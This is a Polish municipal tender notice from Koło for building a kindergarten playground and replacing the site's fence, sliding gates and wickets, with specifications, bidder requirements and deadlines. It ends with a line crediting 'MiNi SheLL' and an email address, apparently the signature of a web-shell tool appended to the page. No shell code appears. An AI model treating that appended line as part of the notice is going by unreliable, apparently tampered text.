DANE OGÓLNE PRZEDMIOTU ZAMÓWIENIA: 
W ramach przedmiotu zamówienia należy wykonać następujący zakres robót:
1.Demontaż istniejącego ogrodzenia. Demontaż istniejącego ogrodzenia tj. słupków, siatki oraz cokołów i fundamentów betonowych z wywiezieniem gruzu i elementów metalowych rozbieranego ogrodzenia.
2. Wykonanie betonowych cokołów ogrodzeniowych. Wykonanie cokołu fundamentowego ogrodzeniowego z betonu B-25, w którym zostaną zabetonowane słupki ogrodzeniowe. Cokół o szerokości 0,20 m zagłębiony w gruncie 0,80 m i wystający ponad gruntem 0,45 m. Na wierzchu cokołu zostanie wykonana gładź cementowa z wyrobieniem spadków i zfazowań krawędzi wierzchu i bocznych powierzchni. Wierzch i boczne powierzchnie cokołu zostaną zatarte. Na długości cokołu w odległości około 2,40 m zostaną wykonane dylatacje. 
3. Montaż ogrodzenia z siatkowych paneli ogrodzeniowych. Wygrodzenie terenu obiektu przedszkola ogrodzeniem systemowym z siatkowych paneli ogrodzeniowych ocynkowanych i polimeryzowanych w kolorze zielonym o wysokości panela 1,40 m w rozstawie słupków co około 2,40 m zabetonowanych w betonowym cokole. Łącznie z cokołem całkowita wysokość ogrodzenia będzie wynosiła około 1,80 - 1,85 m. Konstrukcja ogrodzenia musi być wykonana bez żadnych ostrych krawędzi i elementów niebezpiecznych dla dzieci, ocynkowana i malowana proszkowo w kolorze RAL 6005 (zielony). Dodatkowo uwzględnić zabezpieczenie góry pionowych prętów paneli poziomym zgrzanym do nich fabrycznie poziomo L 30x30x4 mm lub prętem fi 5 mm, które także będą ocynkowane i polimeryzowane. Panele zostaną wykonane z prętów stalowych fi 5 mm o oczkach 5x20 cm z trzema przetłoczeniami na wysokości. Panele do słupków wykonanych z profili prostokątnych zamkniętych 40x60x3 mm będą mocowane wyłącznie za pomocą metalowych ścisków prętów i obejm. Słupki ogrodzeniowe zostaną wypełnione wewnątrz betonem B-20 i zwieńczone zaślepką. W ogrodzeniu zostaną zamontowane trzy furtki i trzy bramy przesuwne. 
4. Montaż trzech bram przesuwnych w ogrodzeniu. W ogrodzeniu zostaną zamontowane trzy bramy przesuwne o szerokości w świetle wjazdu 6,30 m i wysokości około 1,85 m dopasowanej do poziomów krawężników otaczających drogę wjazdową tak aby góra bramy licowała z górą ogrodzenia. Brama przesuwna będzie wykonana w postaci ram w których pas górny, pas dolny, słupki będą wykonane z profili metalowych kwadratowych zamkniętych 80x80x3 mm, zastrzały z profili 60x40x3 mm. Wypełnienie pionowe bramy będzie wykonane z profili prostokątnych 25x40x2 mm rozmieszczonych w rozstawie osiowym co około 11 cm. Szyna prowadząca zostanie wykonana z rury prostokątnej półzamkniętej 100x120x5 mm. Dwie pary słupów prowadzących oraz jedna para słupów najazdowych zostaną wykonane z profilu rury kwadratowej 100x100x4 mm. Pod dwie pary słupów prowadzących zostanie wykonany fundament z betonu B-25 zbrojony wieńcem z 4 prętów fi 12 stal 34GS l=3,00 m, strzemiona fi 6 stal 34GS o oczkach 25x25 cm i rozstawie 20 cm o wymiarach 0,55x3,10x1,20 m w którym zostaną zabetonowane dwa zespoły jezdne z rolkami w rozstawie osiowym około 2,50 m. Pod jedną parę słupów najazdowych zostanie wykonany fundament z betonu B25 o wymiarach 0,55x0,55x1,20 m. Bramy kompletne z metalowymi klamkami i zamkami, zespołami jezdnymi, układami prowadzącymi pionowymi mocowanymi do słupków prowadzących i najazdowych, układem prowadzącym rolkowym poziomym mocowanym do słupków najazdowych. Pary słupków zwieńczone profilem 100x60x4. Wszystkie profile i elementy metalowe bram i słupów zabezpieczone od góry przed dostawaniem opadów do ich wnętrza oraz zabezpieczone antykorozyjnie poprzez ocynkowane i malowane proszkowo. 
5. Montaż trzech furtek w ogrodzeniu. W ogrodzeniu zostaną zamontowane trzy furtki o szerokości w świetle 1,2 m i wysokości około 1,80 - 1,85 m w postaci ram wykonanych z profili metalowych prostokątnych zamkniętych 60x40x3. Wypełnienie pionowe furtki będzie wykonane z profili prostokątnych 20x30x2 mm rozmieszczonych w rozstawie osiowym co około 11 cm. Furtki kompletne z metalowymi klamkami i zamkami. Furtki będą mogły po otwarciu wyłożyć się na ogrodzenie. Słupki przyfurtkowe z profili 100x100x4, wypełnione wewnątrz betonem B-20 i zakończone zaślepką. Fundamenty pod słupki z betonu B-25 o wymiarach 0,60x0,60x1,20 m. Wszystkie słupy, furtki i pozostałe elementy metalowe ocynkowane i malowane proszkowo. 
III. INFORMACJE OGÓLNE W ZAKRESIE PRZEDMIOTU ZAMÓWIENIA.
1.W przypadku wynagrodzenia ryczałtowego przedmiary robót mają charakter pomocniczy w wycenie przedmiotu zamówienia.
2. Do oferty należy załączyć wypełnioną tabelę elementów cenotwórczych wg załączonego przez zamawiającego wzoru.
3. Przedmiot  zamówienia opisany jest za pomocą dokumentacji składającej się z projektu zagospodarowania, specyfikacji technicznej wykonania i odbioru robót oraz tabeli elementów cenotwórczych. 
4. Wymagania w stosunku do stosowanych wyrobów i materiałów - materiały użyte do realizacji zadania powinny odpowiadać wymogom określonym w art. 10 ustawy Prawo budowlane. 
5. Wykonawca zobowiązany jest do dokonania wizji lokalnej na terenie planowanych robót oraz zdobycia wszelkich informacji, które mogą być konieczne do przygotowania oferty.
6. Wykonawca winien uwzględnić w oferowanej cenie również koszty związane z obowiązkami, które będą na nim spoczywały tj.:
1) Odpowiednie zabezpieczenia terenu budowy, wraz z bezpośrednim sąsiedztwem prowadzonych prac.
2) Zapewnienie dozoru placu budowy i realizowanych obiektów w okresie prowadzonych robót.
3) Opracowanie powykonawczej dokumentacji technicznej, inwentaryzacji geodezyjnej powykonawczej oraz opracowanie i dostarczenie zamawiającemu wszelkich instrukcji dotyczących użytkowania urządzeń i wyposażenia sporządzonych w języku polskim.
4) Przekazanie stosowanych atestów na wbudowywane materiały i urządzenia (wyposażenie placu zabaw), w tym wymagane w zakresie nawierzchni, o których mowa w pk-cie I.3.3) a) do e) i pk-cie I.9 (dla urządzeń do zabaw). w opisie przedmiotu zamówienia - na etapie przed podpisaniem umowy oraz dokument o którym mowa w I.3.3)f) - jako dokument odbiorowy.
5) Wykonawca w ofercie powinien uwzględnić koszt wywozu wraz z rozładunkiem nadmiaru gruntu w miejsce wskazane przez Zamawiającego (w odległości do 5 km).
7.Pozostałe warunki i obowiązki stron zawarte są w projekcie umowy stanowiącym załącznik do SIWZ.
8. Wymagane jest udzielenie przez Wykonawcę na wykonane prace 5 letniej gwarancji.
9. Jeżeli Zamawiający dopuszcza zastosowanie materiałów i urządzeń równoważnych rozumie przez to takie materiały i urządzenia, które spełniają wszystkie parametry techniczne przewidziane dla tych materiałów i urządzeń określone w dokumentacji. Wówczas Wykonawca zamierzający zastosować rozwiązania równoważne (w zakresie materiałów lub urządzeń), jest obowiązany wykazać w ofercie, że proponowane przez niego zamienniki spełniają minimalne wymagania określone przez Zamawiającego (opisane za pomocą lub z uwzględnieniem norm, aprobat, specyfikacji technicznych i systemów odniesienia), poprzez sporządzenie ich wykazu i załączenie odpowiednich dokumentów potwierdzających równoważność w zakresie minimalnych i/lub maksymalnych parametrów określonych w dokumentacji.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9, 45.34.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 75.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zadanie Nr1-10500 zł
ZadanieNr2 2700 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy zobowiązani są udokumentować posiadanie wiedzy i doświadczenia uzyskanego samodzielnie, w ramach konsorcjum lub spółki cywilnej, albo na podstawie pisemnego zobowiązania innego podmiotu, o którym mowa jest w Załączniku Nr 4 do SIWZ, które obejmuje:

a)	Dla zadania Nr 1 - wykonanie co najmniej dwóch robót budowlanych w okresie ostatnich 5 lat przed upływem terminu składania ofert w przedmiotowym postępowaniu o udzielenie zamówienia publicznego, o wartości minimum 200.000,00 zł brutto każda w zakresie budowy placów zabaw o nawierzchni bezpiecznej.
b)	Dla zadania Nr 2 - wykonanie co najmniej jednej roboty budowlanej w okresie ostatnich 5 lat przed upływem terminu składania ofert w przedmiotowym postępowaniu o udzielenie zamówienia publicznego, o wartości minimum 80.000,00 zł brutto w zakresie budowy ogrodzeń systemowych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Na etapie przed podpisaniem umowy Zamawiający będzie wymagał przedstawienia dokumentów w zakresie zastosowanych nawierzchni takich jak:
a) certyfikat lub deklarację zgodności z normą PN-EN 14877:2008, lub deklarację właściwości użytkowych, lub aprobatę techniczną ITB, lub rekomendację techniczną ITB, lub wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni Np. Labosport, lub dokument równoważny.
b) Kartę techniczną oferowanej nawierzchni, potwierdzoną przez jej producenta. 
c) Atest PZH lub równoważny dla oferowanej nawierzchni.
d) Autoryzację producenta nawierzchni poliuretanowej, wystawioną dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.
e) Badania na zawartość pierwiastków śladowych.
2. Wszystkie urządzenia do zabawy muszą spełniać warunki zawarte w normie PN-EN1176-1 - Wyposażenie placów zabaw. Ogólne wymagania bezpieczeństwa i metody badań. Wszystkie muszą posiadać certyfikat bezpieczeństwa za wyjątkiem wykonywanych jako modyfikacje typowych tj. zjeżdżalni nr 2 i pomostu wiszącego nr 4. Urządzenia zabawowe powinny posiadać pięcioletni okres gwarancji, powinny być wykonane z bezpiecznych i trwałych materiałów, powinny być zgodne z Polskimi Normami oraz warunkami bezpieczeństwa określonymi w szczególności w przepisach o ogólnym bezpieczeństwie produktów oraz przepisach w sprawie bezpieczeństwa i higieny w publicznych i niepublicznych szkołach i placówkach.
3.pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów, jeżeli jest wymagane; 
4. pełnomocnictwo do składania oferty łącznej w zakresie określonym w art. 23 ust. 2 Ustawy, jeżeli jest wymagane;
5. dokumenty, o których mowa jest w Rozdziale II ust. III.9. SIWZ, jeżeli są wymagane; 
6. zobowiązanie do udostępnienia zasobów przez inne podmioty, zgodnie z Załącznikiem Nr 4, jeżeli wykonawca będzie korzystał z zasobów innych podmiotów; 
7. wykaz części zamówienia, których wykonanie wykonawca powierzy podwykonawcom - na Załączniku Nr 5, jeżeli wykonawca będzie korzystał z podwykonawstwa. 
8. Jeżeli w kraju zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w pkt. III.4.3.1), zastępuje się go dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sadowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem -wystawione z odpowiednią datą wymaganą dla tego dokumentu (nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) termin realizacji 2) kierownik budowy 3) inspektor nadzoru 4) zmiana podwykonawcy na zasadach określonych w druku PROJEKT UMOWY</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kolo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kole, Wydział Zamówień Publicznych, 62-600 Koło, ul. Mickiewicza 12...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2015 godzina 12:00, miejsce: Urząd Miejski w Kole, 62-600 Koło, ul. Mickiewicza 12, Sekretariat Burmistrza Miasta Koła, pok. nr 9 (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie I - wykonanie placu zabaw i ogrodzenia wewnętrznego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 1 obejmuje:
1) Oczyszczenie terenu, wykonanie odwodnienia i przygotowanie podbudowy pod plac zabaw o nawierzchni syntetycznej pod urządzenia zabawowe i miejsce do ćwiczeń i gier zespołowych. 2) Wykonanie nawierzchni bezpiecznej - część placu zabaw na której będą umieszczone urządzenia zabawowe. 3) Wykonanie nawierzchni - część placu zabaw przeznaczona do ćwiczeń i gier zespołowych. 4) Wykonanie ogrodzenia placu zabaw - część placu zabaw na której będą umieszczone urządzenia zabawowe. 5) Wykonanie ogrodzenia placu zabaw - część placu zabaw przeznaczona do ćwiczeń i gier zespołowych. 6) Wykonanie terenów zielonych.7) Wykonanie piaskownic.8) Dostawa i montaż urządzeń zabawowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 75.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie II - wykonanie ogrodzenia zewnętrznego całego obiektu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Demontaż istniejącego ogrodzenia.
2. Wykonanie betonowych cokołów ogrodzeniowych.
3. Montaż ogrodzenia z siatkowych paneli ogrodzeniowych.
4. Montaż trzech bram przesuwnych w ogrodzeniu.
5. Montaż trzech furtek w ogrodzeniu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.34.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 75.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com